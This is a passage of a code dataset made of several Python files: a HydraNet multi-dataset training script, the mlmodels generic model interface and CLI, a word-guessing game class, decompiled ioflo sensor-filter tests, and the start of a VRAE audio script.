checkpoints = sorted([path for path in os.listdir(checkpoint_dir) if path.endswith('pth')],\n key=sortkey)\n if len(checkpoints) < 1:\n raise ValueError(f'No checkpoints to load from in {checkpoint_dir} for {exp_name}')\n checkpoint_path = checkpoints[-1]\n state_dict = torch.load(os.path.join(checkpoint_dir, checkpoint_path))\n if reset_iter:\n iteration = 0\n else:\n iteration = int(''.join([c for c in os.path.basename(checkpoint_path) if c.isdigit()]))\n if backbone_only:\n for key in list(state_dict.keys()):\n if \"backbone\" not in key:\n del state_dict[key]\n print(f'Loading {checkpoint_path}, setting iteration as {iteration}')\n strict = not sloppy \n hydranet.load_state_dict(state_dict, strict=strict)\n return iteration\n\n\ndef parse_device_from_args(args) -> str:\n device = f'cuda:{args.gpu_ids[0]}' if torch.cuda.is_available() else 'cpu'\n return device\n\n\ndef parse_str_to_device(device_str):\n if device_str == 'cpu':\n return 'cpu'\n elif device_str.isdigit():\n return 'cuda:' + device_str\n elif device_str.startswith('cuda:'):\n return device_str\n else:\n raise ValueError('Invalid device ID. use \"cpu\", \"cuda:#\" or \"#\" where # is GPU number. Got:' + device_str)\n\ndef init_style_randomizer(p=None, device='0') -> None:\n device = parse_str_to_device(device)\n StyleRandomizer.set_default_device(device)\n if p is not None:\n if 0 <= p <= 1.0:\n StyleRandomizer.get_instance(p)\n else:\n raise ValueError('Style randomization probability must be in range [0, 1]')\n\n\ndef process_arguments(args: argparse.Namespace) -> tuple:\n # Arg checks\n if args.avg_grad and args.clip_grad_norm:\n raise ValueError(\"Joint gradient averaging clipping is not supported\")\n if args.half and not APEX_AVAILABLE:\n raise ModuleNotFoundError('apex module needed for half-precision training. Install from ' +\n 'https://github.com/NVIDIA/apex')\n args.save_points.append(args.maxit)\n args.pretrained = bool(args.pretrained)\n exp_name = args.checkpoint_dir\n if exp_name.endswith('/'):\n exp_name = exp_name[:-1]\n exp_name = os.path.basename(exp_name)\n definition_path = os.path.join(args.checkpoint_dir, exp_name + '.yaml')\n device = parse_device_from_args(args)\n\n if len(args.learning_rate) == 1:\n args.learning_rate = args.learning_rate[0]\n\n # Create checkpoint directory if needed\n os.makedirs(args.checkpoint_dir, exist_ok=True)\n return definition_path, device, exp_name\n\n\ndef init_optimizer(network: torch.nn.Module, lr: Union[float, List[float]]):\n # If network is wrapped in DataParralel, extract it\n network = network.module if hasattr(network, 'module') else network\n if type(lr) == list:\n optimizer = torch.optim.AdamW([{'params': network.backbone.parameters(), 'lr': lr[0]}, {'params': network.heads.parameters(), 'lr': lr[1]}])\n\n else:\n optimizer = torch.optim.AdamW([{'params': network.backbone.parameters()}, {'params': network.heads.parameters()}], lr=lr)\n return optimizer\n\n\ndef init_scheduler(args, optimizer):\n if args.scheduler == 'decay':\n return torch.optim.lr_scheduler.ExponentialLR(optimizer, gamma=args.decay)\n elif args.scheduler == '1cycle':\n return torch.optim.lr_scheduler.OneCycleLR(optimizer, max_lr=args.learning_rate, total_steps=args.maxit)\n else:\n raise ValueError(\"Scheduler \" + args.scheduler + \" is not supported\")\n\n\n\ndef train():\n parser = argparse.ArgumentParser()\n # Required params\n parser.add_argument('checkpoint_dir', type=str, help='Where to save checkpoints')\n parser.add_argument('configs', nargs='+', help='Path to dataset config files')\n # Hyperparams\n parser.add_argument('-i', '--maxit', type=int, default=5000, help='Max number of iterations to train')\n parser.add_argument('-s', '--save_iterations', type=int, default=300, help='After how many iterations to save')\n parser.add_argument('-b', '--batch_size', type=int, default=3, help='Batch size')\n parser.add_argument('-lr', '--learning_rate', type=float, nargs='+', default=[1e-4, 3e-3], help='Learning rate(s). Max lr for 1cycle. If given 2 LRs, first is for backbone, and second is for heads')\n parser.add_argument('-d', '--decay', type=float, default=0.9, help='Exponential learning rate decay power')\n parser.add_argument('-di', '--decay_iters', type=int, default=300, help='Decay step after how many iterations. For 1cycle it is the number of iterations in a cycle')\n parser.add_argument('-sr', type=float, default=0.5, help='Style Randomization probability')\n # Loading parameters\n parser.add_argument('--continue_ckpt', action='store_true', help='Load latest checkpoint from checkpoint_dir')\n parser.add_argument('--load_from', type=str, help='Load weights from given checkpoint or checkpoint directory')\n parser.add_argument('--reset_iter', action='store_true', help=\"When loading checkpoint, always start with iteration 0\")\n parser.add_argument('--sloppy_load', action='store_true', help=\"Do not load weights strictly\")\n parser.add_argument('--load_backbone_only', action='store_true', help=\"Load backbone only\")\n # Logging\n parser.add_argument('-l', '--log_iterations', type=int, default=100, help='After how many iterations log predictions')\n parser.add_argument('--save_points', type=int, nargs='*', help='Iterations which to save. Latest one is always saved', default=[])\n # Misc\n parser.add_argument('--backbone', type=str, default='resnet101', help='Hydranet backbone to use')\n parser.add_argument('--freeze_backbone', action='store_true', help='Freeze backbone (only train heads)')\n parser.add_argument('--pretrained', type=int, default=1)\n parser.add_argument('--gpu_ids', nargs='+', type=int, help=\"Devices to use with DataParallel\", default=[0])\n # Advanced optimization flags\n parser.add_argument('--avg_grad', action='store_true', help='Average gradients of all datasets')\n parser.add_argument('--clip_grad_norm', action='store_true', help='Clip gradient norms to 1')\n # Half-precision\n parser.add_argument('--half', action='store_true', help='Use half-precision (float16)')\n parser.add_argument('-O', '--opt_level', type=str, choices=['0', '1', '2', '3'], default='1',\n help='Apex FP16 optimization level')\n # Data loader params\n parser.add_argument('--group', action='store_true', help='Concatenate datasets with same name together')\n parser.add_argument('-by', '--group_by', type=str, default='name', help='Group dataset by what parameter (can be put in dataset config). --group flag must be set')\n parser.add_argument('--common_conf', type=str, help='Config to apply to all datasets')\n parser.add_argument('--sr_device', type=str, help='Device to use for for SR', default='0')\n parser.add_argument('-w', '--num_workers', type=int, help=\"Number of separate processes per data loader\", default=0)\n parser.add_argument('--scheduler', type=str, choices=['decay', '1cycle'], default='1cycle', help=\"Learning rate scheduler to use.\")\n parser.add_argument('--upscale_feats', type=float, help=\"Upscale featuremap before input to heads\", default=0)\n # Parse arguments\n args = parser.parse_args()\n\n definition_path, device, exp_name = process_arguments(args)\n init_style_randomizer(args.sr, args.sr_device)\n hydranet = HydraNet.make_from_backbone_name(backbone_name=args.backbone, pretrained=args.pretrained,\n return_all=True, upscale_feats=args.upscale_feats)\n datasets, data_loaders = create_datasets_and_loaders_from_args(args=args, hydranet=hydranet, device=device)\n \n save_definition(definition_path=definition_path, backbone_name=args.backbone, hydranet=hydranet)\n if args.continue_ckpt:\n load_weights_and_get_iteration_from_checkpoint(hydranet, args.checkpoint_dir, reset_iter=args.reset_iter, sloppy=args.sloppy_load, backbone_only=args.load_backbone_only)\n elif args.load_from is not None:\n load_weights_and_get_iteration_from_checkpoint(hydranet, args.load_from, reset_iter=args.reset_iter, sloppy=args.sloppy_load, backbone_only=args.load_backbone_only)\n\n torch.cuda.set_device(device)\n move_to_devices(hydranet=hydranet, gpu_ids=args.gpu_ids, device=device)\n\n if args.freeze_backbone:\n hydranet.backbone.eval()\n for param in hydranet.backbone.parameters():\n param.requires_grad = False\n\n optimizer = init_optimizer(hydranet, lr=args.learning_rate)\n if args.half:\n hydranet, optimizer = convert_network_and_get_optimizer_as_fp16(network=hydranet, optimizer=optimizer,\n opt_level='O' + args.opt_level)\n\n def backward_loss(_loss, _optimizer):\n with apex.amp.scale_loss(_loss, _optimizer) as scaled_loss:\n scaled_loss.backward()\n else:\n def backward_loss(_loss, _optimizer=None):\n _loss.backward()\n\n scheduler = init_scheduler(args, optimizer)\n writer = SummaryWriter(os.path.join(args.checkpoint_dir, 'runs', 'run_' + str(time.time())))\n epoch = 0\n done = False\n iteration = 0\n start_time = time.time()\n while True:\n assert iteration <= args.maxit, f\"Iteration was greater than maxit {iteration} > {args.maxit}\"\n ## Pre-epoch\n # Training loop\n end_time = time.time()\n print(iteration, round(end_time - start_time, 2))\n start_time = time.time()\n\n for data_loader in data_loaders:\n dataset: HydranetDataset = data_loader.dataset\n data = next(data_loader.iterator)\n for key in data:\n data[key] = data[key].to(device)\n\n # if args.half:\n # # Convert data to half precision\n # for key in data:\n # if data[key].dtype != torch.long:\n # data[key] = data[key].half()\n\n loss = dataset.get_loss(data)\n optimizer.zero_grad()\n\n backward_loss(loss, optimizer)\n\n if args.clip_grad_norm:\n torch.nn.utils.clip_grad_norm_(hydranet.parameters(), max_norm=1.0)\n\n if not args.avg_grad:\n optimizer.step()\n\n # Log loss\n writer.add_scalar('loss/' + dataset.get_name(), loss.item(), iteration)\n writer.add_scalar('lr', scheduler.get_lr()[-1], iteration)\n print(dataset.get_name(), loss.item())\n # Keep account of iterations trained for. Stop if done\n iteration += 1\n if iteration == args.maxit:\n save_model(hydranet, args.checkpoint_dir, iteration, name=exp_name, iters_to_keep=args.save_points)\n break\n\n # Save model parameters every ´save_iterations´ iterations\n if iteration % args.save_iterations == 0:\n print('Saving iteration', iteration)\n save_model(hydranet, args.checkpoint_dir, iteration, name=exp_name, iters_to_keep=args.save_points)\n if args.avg_grad:\n for param in hydranet.parameters():\n param.grad /= len(data_loaders)\n optimizer.step()\n if args.scheduler == 'decay' and iteration % args.decay_iters == 0:\n epoch += 1\n scheduler.step(epoch)\n elif args.scheduler == '1cycle':\n scheduler.step()\n\n\n\nif __name__ == '__main__':\n train()\n\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":14459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"587633479","text":"# -*- coding: utf-8 -*-\n\"\"\"\nLightweight Functional interface to wrap access to Deep Learning, RLearning models.\nLogic follows Scikit Learn API and simple for easy extentions logic.\nGoal to facilitate Jupyter to Prod. models.\n\n\nModels are stored in model_XX/ or in folder XXXXX\n module : folder/mymodel.py, contains the methods, operations.\n model : Class in mymodel.py containing the model definition, compilation\n \n\nmodels.py #### Generic Interface\n module_load(model_uri)\n model_create(module)\n fit(model, module, session, data_pars, out_pars )\n metrics(model, module, session, data_pars, out_pars)\n predict(model, module, session, data_pars, out_pars)\n save(save_pars)\n load(load_pars)\n \n\n\n\n \n\n######### Code sample #############################################################################\nhttps://github.com/arita37/mlmodels/blob/dev/README_model_list.md\n\n\n\n######### Command line sample #####################################################################\n#### generate config file\npython mlmodels/models.py --do generate_config --model_uri model_tf.1_lstm.py --save_folder \"c:\\myconfig\\\" \n\n#### Cusomt Directory Models\npython mlmodels/models.py --do test --model_uri \"D:\\_devs\\Python01\\gitdev\\mlmodels\\mlmodels\\model_tf\\1_lstm.py\"\n\n\n### RL model\npython models.py --model_uri model_tf.rl.4_policygradient --do test\n\n### TF DNN model\npython models.py --model_uri model_tf.1_lstm.py --do test\n\n## PyTorch models\npython models.py --model_uri model_tch.mlp.py --do test\n\n\n\"\"\"\nimport argparse\nimport glob\nimport inspect\nimport json\nimport os\nimport re\nimport sys\nfrom importlib import import_module\nfrom pathlib import Path\nfrom warnings import simplefilter\n\n####################################################################################################\nfrom mlmodels.util import (get_recursive_files, load_config, log, os_package_root_path)\n\nfrom mlmodels.util import (env_build, env_conda_build, env_pip_requirement)\n\nsimplefilter(action='ignore', category=FutureWarning)\nsimplefilter(action='ignore', category=DeprecationWarning)\n\n\n####################################################################################################\ndef module_env_build(model_uri=\"\", verbose=0, env_build=0):\n \"\"\"\n Load the file which contains the model description\n model_uri: model_tf.1_lstm.py or ABSOLUTE PATH\n \"\"\"\n # print(os_file_current_path())\n model_uri = model_uri.replace(\"/\", \".\")\n module = None\n if verbose:\n print(model_uri)\n\n #### Dynamic ENV Build based on requirements.txt\n if env_build:\n env_pars = {\"python_version\": '3.6.5'}\n env_build(model_uri, env_pars)\n\n\ndef module_load(model_uri=\"\", verbose=0, env_build=0):\n \"\"\"\n Load the file which contains the model description\n model_uri: model_tf.1_lstm.py or ABSOLUTE PATH\n \"\"\"\n # print(os_file_current_path())\n model_uri = model_uri.replace(\"/\", \".\")\n module = None\n if verbose:\n print(model_uri)\n\n try:\n #### Import from package mlmodels sub-folder\n model_name = model_uri.replace(\".py\", \"\")\n module = import_module(f\"mlmodels.{model_name}\")\n # module = import_module(\"mlmodels.model_tf.1_lstm\")\n\n except Exception as e1:\n try:\n ### Add Folder to Path and Load absoluate path model\n path_parent = str(Path(model_uri).parent.absolute())\n sys.path.append(path_parent)\n # print(path_parent, sys.path)\n\n #### import Absilute Path model_tf.1_lstm\n model_name = Path(model_uri).stem # remove .py\n model_name = str(Path(model_uri).parts[-2]) + \".\" + str(model_name)\n # print(model_name)\n module = import_module(model_name)\n\n except Exception as e2:\n raise NameError(f\"Module {model_name} notfound, {e1}, {e2}\")\n\n if verbose: print(module)\n return module\n\n\ndef module_load_full(model_uri=\"\", model_pars=None, data_pars=None, compute_pars=None, choice=None, **kwarg):\n \"\"\"\n Create Instance of the model, module\n model_uri: model_tf.1_lstm.py\n \"\"\"\n module = module_load(model_uri=model_uri)\n model = module.Model(model_pars=model_pars, data_pars=data_pars, compute_pars=compute_pars, **kwarg)\n return module, model\n\n\ndef model_create(module, model_pars=None, data_pars=None, compute_pars=None, **kwarg):\n \"\"\"\n Create Instance of the model from loaded module\n model_pars : dict params\n \"\"\"\n if model_pars is None:\n model_pars = module.get_params()\n\n model = module.Model(model_pars=model_pars, data_pars=data_pars, compute_pars=compute_pars, **kwarg)\n return model\n\n\ndef fit(module, model, sess=None, data_pars=None, compute_pars=None, out_pars=None, **kwarg):\n \"\"\"\n Wrap fit generic method\n :type model: object\n \"\"\"\n\n #module, model = module_load_full(model_uri, model_pars, data_pars, compute_pars)\n #sess=None\n return module.fit(model, data_pars=data_pars, compute_pars=compute_pars, out_pars=out_pars, **kwarg)\n\n\ndef predict(module, model, sess=None, data_pars=None, compute_pars=None, out_pars=None, **kwarg):\n \"\"\"\n predict using a pre-trained model and some data\n :return:\n \"\"\"\n # module = module_load(model_uri)\n # model,sess = load(model_pars)\n\n return module.predict(model, sess, data_pars=data_pars, compute_pars=compute_pars, out_pars=out_pars, **kwarg)\n\n\ndef fit_metrics(module, model, sess=None, data_pars=None, compute_pars=None, out_pars=None, **kwarg):\n return module.fit_metrics(model, sess, data_pars, compute_pars, out_pars, **kwarg)\n\n\ndef get_params(module, params_pars, **kwarg):\n return module.get_params(params_pars, **kwarg)\n\n\ndef metrics(module, model, sess=None, data_pars=None, compute_pars=None, out_pars=None, **kwarg):\n return module.metrics(model, sess, data_pars, compute_pars, out_pars, **kwarg)\n\n\ndef load(module, load_pars, **kwarg):\n \"\"\"\n Load model/session from files\n :param folder_name:\n \"\"\"\n return module.load(load_pars, **kwarg)\n\n\ndef save(module, model, session, save_pars, **kwarg):\n \"\"\"\n Save model/session on disk\n \"\"\"\n return module.save(model, session, save_pars, **kwarg)\n\n\n####################################################################################################\n####################################################################################################\ndef test_all(folder=None):\n if folder is None:\n folder = os_package_root_path() + \"/model_tf/\"\n\n # module_names = get_recursive_files(folder, r\"[0-9]+_.+\\.py$\")\n module_names = config_model_list()\n module_names.sort()\n print(module_names)\n failed_scripts = []\n\n for module_name in module_names:\n print(\"#######################\")\n print(module_name)\n test(module_name)\n\n\ndef test(modelname):\n print(modelname)\n try:\n module = module_load(modelname, verbose=1)\n print(module)\n module.test()\n del module\n except Exception as e:\n print(\"Failed\", e)\n\n\ndef test_global(modelname):\n print(modelname)\n try:\n module = module_load(modelname, verbose=1)\n print(module)\n module.test()\n del module\n except Exception as e:\n print(\"Failed\", e)\n\n\ndef test_api(model_uri=\"model_xxxx/yyyy.py\", param_pars=None):\n log(\"############ Model preparation ##################################\")\n from mlmodels.models import module_load_full\n from mlmodels.models import fit as fit_global\n from mlmodels.models import predict as predict_global\n from mlmodels.models import save as save_global, load as load_global\n\n\n log(\"#### Module init ############################################\")\n from mlmodels.models import module_load\n module = module_load(model_uri)\n log(module)\n\n\n log(\"#### Loading params ##############################################\")\n model_pars, data_pars, compute_pars, out_pars = get_params(module, param_pars)\n\n\n log(\"#### Model init ############################################\")\n session = None\n from mlmodels.models import model_create\n model = model_create(module, model_pars, data_pars, compute_pars)\n\n module, model = module_load_full(model_uri, model_pars, data_pars, compute_pars)\n\n\n log(\"############ Model fit ##########################################\")\n model, sess = fit_global(module, model, sess=None, data_pars=data_pars, compute_pars=compute_pars, out_pars=out_pars)\n print(\"fit success\", sess)\n\n\n log(\"############ Prediction############################################\")\n ### Load model, and predict \n preds = predict_global(module, model, session, data_pars=data_pars, compute_pars=compute_pars, out_pars=out_pars)\n print(preds)\n\n\n log(\"############ Save/ Load ############################################\")\n # save_global( save_pars, model, sess)\n # load_global(save_pars)\n\n\n\ndef test_module(model_uri=\"model_xxxx/yyyy.py\", param_pars=None):\n # Using local method only\n\n log(\"#### Module init ############################################\")\n from mlmodels.models import module_load\n module = module_load(model_uri)\n log(module)\n\n log(\"#### Loading params ##############################################\")\n #param_pars = {\"choice\":pars_choice, \"data_path\":data_path, \"config_mode\": config_mode}\n model_pars, data_pars, compute_pars, out_pars = module.get_params(param_pars)\n\n\n log(\"#### Model init ############################################\")\n model = module.Model(model_pars, data_pars, compute_pars)\n log(model)\n\n log(\"#### Fit ########################################################\")\n model, sess = module.fit(model, data_pars, compute_pars, out_pars)\n\n log(\"#### Predict ####################################################\")\n ypred = module.predict(model, sess, data_pars, compute_pars, out_pars)\n print(ypred)\n\n log(\"#### Get metrics ################################################\")\n metrics_val = module.fit_metrics(model, data_pars, compute_pars, out_pars)\n\n log(\"#### Save ########################################################\")\n # save_pars = {}\n # load_pars = {}\n # module.save( save_pars, model, sess)\n\n log(\"#### Load ########################################################\") \n # model2, sess2 = module.load(load_pars)\n # ypred = predict(model2, data_pars, compute_pars, out_pars)\n # metrics_val = metrics(model2, ypred, data_pars, compute_pars, out_pars)\n # print(model2)\n\n\n\n####################################################################################################\n############ JSON template #########################################################################\ndef config_get_pars(config_file, config_mode=\"test\"):\n \"\"\"\n load JSON and output the params\n \"\"\"\n js = json.load(open(config_file, 'r')) # Config\n js = js[config_mode] # test /uat /prod\n model_p = js.get(\"model_pars\")\n data_p = js.get(\"data_pars\")\n compute_p = js.get(\"compute_pars\")\n out_p = js.get(\"out_pars\")\n\n return model_p, data_p, compute_p, out_p\n\n\ndef config_generate_json(modelname, to_path=\"ztest/new_model/\"):\n \"\"\"\n Generate config file from code source\n config_init(\"model_tf.1_lstm\", to_folder=\"ztest/\")\n\n \"\"\"\n os.makedirs(to_path, exist_ok=True)\n ##### JSON file\n import inspect\n module = module_load(modelname)\n signature = inspect.signature(module.Model)\n args = {\n k: v.default if v.default is not inspect.Parameter.empty else None\n for k, v in signature.parameters.items()\n # if v.default is not inspect.Parameter.empty\n }\n\n # args = inspect.getargspec(module.Model)\n model_pars = {\"model_pars\": args,\n \"data_pars\": {},\n \"compute_pars\": {},\n \"out_pars\": {}\n }\n\n modelname = modelname.replace(\".py\", \"\").replace(\".\", \"-\")\n fname = os.path.join(to_path, f\"{modelname}_config.json\")\n json.dump(model_pars, open(fname, mode=\"w\"))\n print(fname)\n\n\n\ndef os_folder_copy(src, dst):\n \"\"\"Copy a directory structure overwriting existing files\"\"\"\n import shutil\n for root, dirs, files in os.walk(src):\n if not os.path.isdir(root):\n os.makedirs(root)\n\n for file in files:\n rel_path = root.replace(src, '').lstrip(os.sep)\n dest_path = os.path.join(dst, rel_path)\n\n if not os.path.isdir(dest_path):\n os.makedirs(dest_path, exist_ok=True)\n\n try :\n shutil.copyfile(os.path.join(root, file), os.path.join(dest_path, file))\n except Exception as e :\n print(e)\n\n\n\ndef config_init(to_path=\".\"):\n \"\"\"\n Generate template from code source\n config_init(\"model_tf.1_lstm\", to_folder=\"ztest/\")\n \"\"\"\n import shutil\n os_root = os_package_root_path()\n\n to_path = os_root + \"/ztest/current/\" if to_path == \".\" else to_path\n log(\"Working Folder\", to_path)\n # os.makedirs(to_path, exist_ok=True)\n\n os_folder_copy(os_root + \"/template/\", to_path + \"/template/\")\n os_folder_copy(os_root + \"/dataset/\", to_path + \"/dataset/\")\n os_folder_copy(os_root + \"/example/\", to_path + \"/example/\")\n \n os.makedirs(to_path + \"model_trained\", exist_ok=True)\n os.makedirs(to_path + \"model_code\", exist_ok=True)\n \n\n #### Config files\n path_user = os.path.expanduser('~')\n path_config = path_user + \"/.mlmodels/config.json\"\n #print(\"config file\", path_config)\n\n os.makedirs(path_user + \"/.mlmodels/\" , exist_ok=True)\n ddict = { \"model_trained\" : to_path + \"/model_trained/\", \n \"dataset\" : to_path + \"/dataset/\", }\n log(\"Config values\", ddict)\n json.dump( ddict, open(path_config, mode=\"w\") )\n\n\n from mlmodels.util import config_path_pretrained, config_path_dataset\n log(\"Config path\", get_pretrained_path() )\n\n\n\n\n\n\n\n\n\n\ndef config_model_list(folder=None):\n # Get all the model.py into folder\n folder = os_package_root_path() if folder is None else folder\n # print(folder)\n module_names = get_recursive_files(folder, r'/*model*/*.py')\n mlist = []\n for t in module_names:\n mlist.append(t.replace(folder, \"\").replace(\"\\\\\", \".\"))\n print(mlist[-1])\n\n return mlist\n\n\n\n\n####################################################################################################\n############CLI Command ############################################################################\ndef cli_load_arguments(config_file=None):\n \"\"\"\n Load CLI input, load config.toml , overwrite config.toml by CLI Input\n \"\"\"\n if config_file is None:\n cur_path = os.path.dirname(os.path.realpath(__file__))\n config_file = os.path.join(cur_path, \"template/models_config.json\")\n # print(config_file)\n\n p = argparse.ArgumentParser()\n\n def add(*w, **kw):\n p.add_argument(*w, **kw)\n\n add(\"--config_file\", default=config_file, help=\"Params File\")\n add(\"--config_mode\", default=\"test\", help=\"test/ prod /uat\")\n add(\"--log_file\", default=\"mlmodels_log.log\", help=\"log.log\")\n add(\"--do\", default=\"test\", help=\"do \")\n add(\"--folder\", default=None, help=\"folder \")\n\n\n add(\"--init\", default=\"\", help=\".\")\n\n ##### model pars\n add(\"--model_uri\", default=\"model_tf/1_lstm.py\", help=\".\")\n add(\"--load_folder\", default=\"ztest/\", help=\".\")\n\n ##### data pars\n add(\"--dataname\", default=\"dataset/google.csv\", help=\".\")\n\n ##### compute pars\n\n ##### out pars\n add(\"--save_folder\", default=\"ztest/\", help=\".\")\n\n arg = p.parse_args()\n # arg = load_config(arg, arg.config_file, arg.config_mode, verbose=0)\n return arg\n\n\ndef main():\n arg = cli_load_arguments()\n print(arg.do)\n\n\n if len(arg.init) > 0 :\n config_init( to_path= arg.init )\n return 0\n\n\n if arg.do == \"generate_config\":\n log(arg.save_folder)\n config_generate_json(arg.model_uri, to_path=arg.save_folder)\n\n\n ###################################################################\n if arg.do == \"model_list\": # list all models in the repo\n l = config_model_list(arg.folder)\n\n\n if arg.do == \"testall\":\n # test_all() # tot test all te modules inside model_tf\n test_all(folder=None)\n\n\n if arg.do == \"test\":\n param_pars = {\"choice\": \"test01\", \"data_path\": \"\", \"config_mode\": \"test\"}\n test_module(arg.model_uri, param_pars=param_pars) # '1_lstm'\n\n test(arg.model_uri) # '1_lstm'\n # test_api(arg.model_uri) # '1_lstm'\n test_global(arg.model_uri) # '1_lstm'\n\n\n if arg.do == \"fit\":\n model_p, data_p, compute_p, out_p = config_get_pars(arg.config_file, arg.config_mode)\n\n module = module_load(arg.model_uri) # '1_lstm.py\n model = model_create(module, model_p, data_p, compute_p) # Exact map JSON and paramters\n\n log(\"Fit\")\n model, sess = module.fit(model, data_pars=data_p, compute_pars=compute_p, out_pars=out_p)\n\n log(\"Save\")\n save_pars = {\"path\": f\"{arg.save_folder}/{arg.model_uri}\", \"model_uri\": arg.model_uri}\n save(save_pars, model, sess)\n\n if arg.do == \"predict\":\n model_p, data_p, compute_p, out_p = config_get_pars(arg.config_file, arg.config_mode)\n # module = module_load(arg.modelname) # '1_lstm'\n load_pars = {\"path\": f\"{arg.save_folder}/{arg.model_uri}\", \"model_uri\": arg.model_uri}\n\n module = module_load(model_p[\".model_uri\"]) # '1_lstm.py\n model, session = load(load_pars)\n module.predict(model, session, data_pars=data_p, compute_pars=compute_p, out_pars=out_p)\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n main()\n\n\n\n","sub_path":"mlmodels/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":17741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"618496311","text":"import random\n\n\nclass MysteryWord:\n\n default_dictionary = \"/usr/share/dict/words\"\n\n def __init__(self, file=default_dictionary, difficulty=0):\n \"\"\"Initializes and instance of the game. Loads the dictionary file,\n asks user for difficulty, selects a word from the dictionary based\n on difficulty level, sets number of guesses, splits the word into\n a list of tuples containing the letter plus \"FALSE\" value indicating\n that the letter has not been guessed by the player.\"\"\"\n\n word_list = self.load_dictionary(file)\n self.word = self.choose_word(word_list, difficulty).upper()\n self.word_length = len(self.word)\n self.prepared_word = self.prepare_word_for_game()\n self.remaining_guesses = 8\n self.guessed_letters = []\n\n def __str__(self):\n word_status_string = \"\"\n for letter in self.prepared_word:\n if letter[1]:\n word_status_string += \" {}\".format(letter[0])\n else:\n word_status_string += \" _\"\n\n return word_status_string\n\n def check_guess(self, player_guess):\n \"\"\" Compares the player's guess to the word to guess.\"\"\"\n player_guess = player_guess.upper()\n\n if player_guess == \"QUIT\":\n exit()\n elif not player_guess.isalpha() or len(player_guess) > 1:\n return -1\n elif player_guess in self.guessed_letters:\n return -2\n elif player_guess in self.word:\n for letter in self.prepared_word:\n if player_guess == letter[0]:\n letter[1] = True\n self.guessed_letters.append(player_guess)\n return 1\n else:\n self.guessed_letters.append(player_guess)\n self.remaining_guesses -= 1\n return 0\n\n def check_win_lose(self):\n \"\"\" Checks to see if the player has won or lost the game \"\"\"\n\n if not self.remaining_guesses:\n return 1\n elif False not in [element[1] for element in self.prepared_word]:\n return 2\n return 0\n\n def choose_word(self, word_list, difficulty):\n \"\"\" Chooses a random word from the provided word_list list and returns\n the word \"\"\"\n if difficulty == 1:\n while True:\n word = random.choice(word_list)\n if 4 <= len(word) <= 6:\n return word\n elif difficulty == 2:\n while True:\n word = random.choice(word_list)\n if 6 <= len(word) <= 10:\n return word\n elif difficulty == 3:\n while True:\n word = random.choice(word_list)\n if len(word) >= 10:\n return word\n else:\n return random.choice(word_list)\n\n def load_dictionary(self, file):\n \"\"\"Loads the dictionary file from the specified location, file should\n be in the format one word per line in the file\"\"\"\n try:\n with open(file, \"r\") as dictionary_file:\n word_list = dictionary_file.read().split()\n return word_list\n except IOError:\n file = self.default_dictionary\n return self.load_dictionary(file)\n\n def prepare_word_for_game(self):\n \"\"\" Prepares the word for used by the game by splitting the word into\n a list of tuples. Each tuple contains a letter from the word, plus\n a boolean value indicating if the player has guessed that letter.\"\"\"\n prepared_word = []\n for pair in zip(self.word,\n [False for letters in range(len(self.word))]):\n prepared_word.append(list(pair))\n return prepared_word\n","sub_path":"legacy/mystery_word27.py","file_name":"mystery_word27.py","file_ext":"py","file_size_in_byte":3738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"618545666","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /usr/lib64/python3.6/site-packages/ioflo/trim/interior/plain/test/testFiltering.py\n# Compiled at: 2017-12-17 08:35:26\n# Size of source mod 2**32: 2092 bytes\n\n\ndef TestTemperature():\n \"\"\" \"\"\"\n storing.Store.Clear()\n doing.Doer.Clear()\n store = storing.Store(name='Test')\n print('\\nTesting Temperature Filter')\n filter = TemperatureSensorFilter(name='filterSensorTemp', store=store, group='filter.sensor.temperature',\n output='state.temperature',\n input='ctd',\n depth='state.depth',\n parms=dict(window=60.0, frac=0.9, preload=10.0, layer=40.0,\n tolerance=5.0))\n output = store.fetch('state.temperature').update(value=10.0)\n output = store.fetch('state.depth').update(value=40.0)\n store.expose()\n filter._expose()\n for k in range(1, 300):\n print('')\n store.advanceStamp(0.125)\n s = 10.0 + 2.0 * math.sin(math.pi * 2.0 * k / 300.0)\n input = store.fetch('ctd').update(temperature=s)\n filter.update()\n filter._expose()\n print(s)\n\n\ndef TestSalinity():\n \"\"\" \"\"\"\n storing.Store.Clear()\n doing.Doer.Clear()\n store = storing.Store(name='Test')\n print('\\nTesting Salinity Filter')\n filter = SalinitySensorFilter(name='filterSensorSalinity', store=store, group='filter.sensor.salinity',\n output='state.salinity',\n input='ctd.salinity',\n parms=dict(window=60.0, frac=0.9))\n output = store.fetch('state.salinity').update(value=32.0)\n store.expose()\n filter._expose()\n for k in range(1, 300):\n print('')\n store.advanceStamp(0.125)\n s = 32.0 + 2.0 * math.sin(math.pi * 2.0 * k / 300.0)\n input = store.fetch('ctd.salinity').update(value=s)\n filter.update()\n filter._expose()\n\n\ndef Test():\n \"\"\"Module Common self test\n\n \"\"\"\n pass\n\n\nif __name__ == '__main__':\n Test()","sub_path":"pycfiles/ioflo-py3.6-dev-1.7.5.linux-x86_64.tar/testFiltering.cpython-36.py","file_name":"testFiltering.cpython-36.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"553486432","text":"#!/usr/bin/env python\n\nimport VRAE\nimport wave\nimport numpy as np\nimport pylab as pl\nimport theano\n\nfrom scipy.io import wavfile as wavfile\nfrom sklearn.feature_extraction.image import extract_patches_2d\n\nhidden_units_encoder = 500\nhidden_units_decoder = hidden_units_encoder\nfeatures = 1\nlatent_variables = 100\nb1 = 0.05\nb2 = 0.001\nlearning_rate = 1e-3\nsigma_init = 1e-3\nbatch_size = 1\n\n\nvrae = VRAE.VRAE(hidden_units_encoder, hidden_units_decoder, features, latent_variables, b1, b2, learning_rate, sigma_init, batch_size)\n\n(wavrate, wavdata) = wavfile.read(\"19_this_is_an_idea.wav\")\n\nwavdata = np.atleast_2d(wavdata[:10000])\n# wavdata = wavdata.reshape((1, wavdata.shape[0], 